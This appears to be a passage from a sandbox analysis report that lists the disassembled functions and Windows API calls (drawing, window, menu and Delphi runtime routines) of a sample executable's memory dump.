SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 00423237
SelectObject.GDI32(?,?), ref: 00423251
DeleteDC.GDI32(?), ref: 0042325A
ReleaseDC.USER32(00000000,?), ref: 00423265

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00454DE0, Relevance: 10.6, APIs: 7, Instructions: 57

APIs

GetCursorPos.USER32 ref: 00454DFB
WindowFromPoint.USER32(?,?), ref: 00454E08
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454E16
GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00454E1D
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00454E36
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00454E4D
SetCursor.USER32(00000000), ref: 00454E5F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004505E8, Relevance: 9.3, APIs: 6, Instructions: 284

APIs

SetFocus.USER32(00000000), ref: 004506A3

Part of subcall function 00450E48: SendMessageA.USER32(00000000,00000229,00000000,00000000), ref: 00450E6F

Part of subcall function 0041F3B8: RtlInitializeCriticalSection.KERNEL32(00422DBC,00422D84,?,00000001,00422F1A,?,?,?,00424185,?,?,00423FA5,?,0000000E,00000000,?), ref: 0041F3D8

SaveDC.GDI32(?), ref: 004507CA
RestoreDC.GDI32(?,?), ref: 0045083B
GetWindowDC.USER32(00000000), ref: 004508A7
SaveDC.GDI32(?), ref: 004508DE
RestoreDC.GDI32(?,?), ref: 00450942

Part of subcall function 0043B13C: DefWindowProcA.USER32(00000000,?,?,?), ref: 0043B243
Part of subcall function 0043B13C: GetCapture.USER32 ref: 0043B260

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0040C14C, Relevance: 9.1, APIs: 6, Instructions: 139

APIs

767E48F1.OLEAUT32(?), ref: 0040C17C
767EFFDA.OLEAUT32(?,00000001,?), ref: 0040C1E1
767EFF8E.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040C203
767F00CA.OLEAUT32(0000000C,?,?), ref: 0040C242

Part of subcall function 0040C00C: 767E3EAE.OLEAUT32(?,00000100,?,?,0040C9DE), ref: 0040C05B

767F0035.OLEAUT32(?,?,?,0000000C,?,?), ref: 0040C2AD
767F0035.OLEAUT32(00000000,?,?,?,?,?,0000000C,?,?), ref: 0040C2CC

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00420880, Relevance: 9.1, APIs: 6, Instructions: 84

APIs

GetSystemMetrics.USER32(0000000B), ref: 004208CE
GetSystemMetrics.USER32(0000000C), ref: 004208DA
GetDC.USER32(00000000), ref: 004208F6
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042091D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042092A
ReleaseDC.USER32(00000000,00000000), ref: 00420963

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00420CF0, Relevance: 9.1, APIs: 6, Instructions: 65

APIs

Part of subcall function 00420BA0: GetObjectA.GDI32(?,00000054), ref: 00420BB4

CreateCompatibleDC.GDI32(00000000), ref: 00420D12
SelectPalette.GDI32(?,?,00000000), ref: 00420D33
RealizePalette.GDI32(?), ref: 00420D3F
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00420D56
SelectPalette.GDI32(?,00000000,00000000), ref: 00420D7E
DeleteDC.GDI32(?), ref: 00420D87

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00433DBC, Relevance: 9.1, APIs: 6, Instructions: 60

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00433DE4
GetWindowLongA.USER32(?,000000F0), ref: 00433DEF
GetWindowLongA.USER32(?,000000F4), ref: 00433E01
SetWindowLongA.USER32(?,000000F4,?), ref: 00433E14
SetPropA.USER32(?,00000000,00000000), ref: 00433E2B
SetPropA.USER32(?,00000000,00000000), ref: 00433E42

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00425E92, Relevance: 9.1, APIs: 6, Instructions: 58

APIs

Part of subcall function 00425998: GetDC.USER32(00000000), ref: 0042599B
Part of subcall function 00425998: GetDeviceCaps.GDI32(00000000,0000005A), ref: 004259A5
Part of subcall function 00425998: ReleaseDC.USER32(00000000,00000000), ref: 004259B2

RtlInitializeCriticalSection.KERNEL32(00464A44), ref: 00425EAB
RtlInitializeCriticalSection.KERNEL32(00464A5C,00464A44), ref: 00425EB5
GetStockObject.GDI32(00000007), ref: 00425EBC
GetStockObject.GDI32(00000005), ref: 00425EC8
GetStockObject.GDI32(0000000D), ref: 00425ED4
LoadIconA.USER32(00000000,00007F00), ref: 00425EE5

Part of subcall function 00425A14: MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21
Part of subcall function 00425A14: MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Part of subcall function 0041DDD4: RtlInitializeCriticalSection.KERNEL32(?), ref: 0041DDEE

Part of subcall function 00425AE0: RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(0041177C,?,?,00442409,00000000,00000000,?,?,00000000,004424B0), ref: 00413F9B

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00420530, Relevance: 9.1, APIs: 6, Instructions: 55

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00420549
SelectObject.GDI32(00000000,00000000), ref: 00420552
GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
SelectObject.GDI32(00000000,00000000), ref: 00420572
DeleteDC.GDI32(00000000), ref: 00420578
CreatePalette.GDI32 ref: 004205BE

Part of subcall function 00420498: GetDC.USER32(00000000), ref: 004204B0
Part of subcall function 00420498: GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
Part of subcall function 00420498: GetPaletteEntries.GDI32(090806FA,00000000,00000008,?), ref: 004204E4
Part of subcall function 00420498: GetPaletteEntries.GDI32(090806FA,00000008,00000008,?), ref: 004204FC
Part of subcall function 00420498: ReleaseDC.USER32(00000000,?), ref: 00420518

Part of subcall function 00420328: GetSystemInfo.KERNEL32(?), ref: 00420338

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041FC14, Relevance: 9.0, APIs: 6, Instructions: 43

APIs

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

UnrealizeObject.GDI32(00000000), ref: 0041FC20
SelectObject.GDI32(?,00000000), ref: 0041FC32
SetBkColor.GDI32(?,00000000), ref: 0041FC55
SetBkMode.GDI32(?,00000002), ref: 0041FC60

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

SetBkColor.GDI32(?,00000000), ref: 0041FC7B
SetBkMode.GDI32(?,00000001), ref: 0041FC86

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00457AFC, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 289

APIs

ClientToScreen.USER32(?,?), ref: 00457C28
OffsetRect.USER32(?,?,?), ref: 00457C3F
OffsetRect.USER32(?,?,?), ref: 00457D6F

Part of subcall function 00455610: GetCurrentThreadId.KERNEL32 ref: 00455628
Part of subcall function 00455610: SetWindowsHookExA.USER32(00000003,004555CC,00000000,00000000), ref: 00455638
Part of subcall function 00455610: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00455653
Part of subcall function 00455610: CreateThread.KERNEL32(00000000,000003E8,00455570,00000000,00000000), ref: 00455677

Part of subcall function 00457718: SetTimer.USER32(00000000,00000000,?,0045551C), ref: 00457732

Part of subcall function 0044DF58: GetActiveWindow.USER32 ref: 0044DF5B
Part of subcall function 0044DF58: GetCurrentThreadId.KERNEL32(0044DF38), ref: 0044DF70
Part of subcall function 0044DF58: EnumThreadWindows.USER32(00000000,0044DF38), ref: 0044DF76

Part of subcall function 00457948: GetCursor.USER32 ref: 00457963
Part of subcall function 00457948: GetIconInfo.USER32(00000000,?), ref: 00457969

Strings

41C, xrefs: 00457C05
|7C, xrefs: 00457CA5

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043A714, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetClassInfoA.USER32(?,?,?), ref: 0043A7D8
UnregisterClassA.USER32(?,?), ref: 0043A800
RegisterClassA.USER32(?), ref: 0043A816

Part of subcall function 0043D99C: IsIconic.USER32(?), ref: 0043D9AB
Part of subcall function 0043D99C: GetWindowPlacement.USER32(?,0000002C), ref: 0043D9C8
Part of subcall function 0043D99C: GetWindowRect.USER32(?), ref: 0043D9E1
Part of subcall function 0043D99C: GetWindowLongA.USER32(?,000000F0), ref: 0043D9EF
Part of subcall function 0043D99C: GetWindowLongA.USER32(?,000000F8), ref: 0043DA04
Part of subcall function 0043D99C: ScreenToClient.USER32(00000000), ref: 0043DA11
Part of subcall function 0043D99C: ScreenToClient.USER32(00000000,?), ref: 0043DA1C

Part of subcall function 0041EAB0: CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

Strings

41C, xrefs: 0043A765
@, xrefs: 0043A74D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0040A328, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A4E3), ref: 0040A393
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A4E3), ref: 0040A3B5

Strings

4s@, xrefs: 0040A494
s@, xrefs: 0040A438
t|@, xrefs: 0040A44A, 0040A4A6

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00409CD8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00409CD6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00403340, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403362
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403395
RegCloseKey.ADVAPI32(?,004033B8,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004033AB

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00403358
FPUMaskValue, xrefs: 0040338C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044FD30, Relevance: 7.7, APIs: 5, Instructions: 171

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044FDEF
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FE6B
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FE9A
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FEC9
MulDiv.KERNEL32(?,00000000,00000000,?), ref: 0044FEEC

Part of subcall function 0044F298: MulDiv.KERNEL32(?,00000001,00000001), ref: 0044F2F5
Part of subcall function 0044F298: MulDiv.KERNEL32(?,00000001,00000001), ref: 0044F315

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004470F8, Relevance: 7.7, APIs: 5, Instructions: 162

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 004471C7
OffsetRect.USER32(?,00000001,00000001), ref: 00447218
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044724D
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044725A

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004472C1

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0042A40C, Relevance: 7.6, APIs: 5, Instructions: 110

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0042A4A6
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A4DE
OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A4E8
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A520
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A547

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043B3DC, Relevance: 7.6, APIs: 5, Instructions: 104

APIs

BeginPaint.USER32(00000000,?), ref: 0043B402
SaveDC.GDI32(?), ref: 0043B436
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043B498
RestoreDC.GDI32(?,?), ref: 0043B4C2

Part of subcall function 0043B538: RectVisible.GDI32(?,?), ref: 0043B5F1
Part of subcall function 0043B538: SaveDC.GDI32(?), ref: 0043B607
Part of subcall function 0043B538: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B62A
Part of subcall function 0043B538: RestoreDC.GDI32(?,?), ref: 0043B645
Part of subcall function 0043B538: CreateSolidBrush.GDI32(00000000), ref: 0043B6C6
Part of subcall function 0043B538: FrameRect.USER32(?,?,?), ref: 0043B6F9
Part of subcall function 0043B538: DeleteObject.GDI32(?), ref: 0043B703
Part of subcall function 0043B538: CreateSolidBrush.GDI32(00000000), ref: 0043B713
Part of subcall function 0043B538: FrameRect.USER32(?,00000000,?), ref: 0043B746
Part of subcall function 0043B538: DeleteObject.GDI32(?), ref: 0043B750

EndPaint.USER32(00000000,?), ref: 0043B4F6

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004593E0, Relevance: 7.6, APIs: 5, Instructions: 86

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 00459416
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0045944A
OffsetRect.USER32(?,000000FF,000000FF), ref: 00459457
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00459489
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004594B0

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00446F38, Relevance: 7.6, APIs: 5, Instructions: 77

APIs

Part of subcall function 00447068: CreatePopupMenu.USER32(?,00446D7B,00000000,00000000,00446DBF), ref: 00447083
Part of subcall function 00447068: CreateMenu.USER32 ref: 0044708D

GetMenuItemCount.USER32(00000000), ref: 00446F70
GetMenuState.USER32(00000000,-00000001,00000400), ref: 00446F91
RemoveMenu.USER32(00000000,-00000001,00000400), ref: 00446FA8
GetMenuItemCount.USER32(00000000), ref: 00446FD8
DestroyMenu.USER32(00000000), ref: 00446FE5

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00456928, Relevance: 7.6, APIs: 5, Instructions: 73

APIs

GetCapture.USER32(?,?,0045BD1C,00000001,00456AEB,?,?,?,0045BD1C), ref: 0045694B
GetParent.USER32(00000000), ref: 00456971

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 0045699F
GetWindowLongA.USER32(00000000,000000FA), ref: 004569AF
SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 004569CE

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00424420, Relevance: 7.6, APIs: 5, Instructions: 66

APIs

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

GetDC.USER32(00000000), ref: 00424476
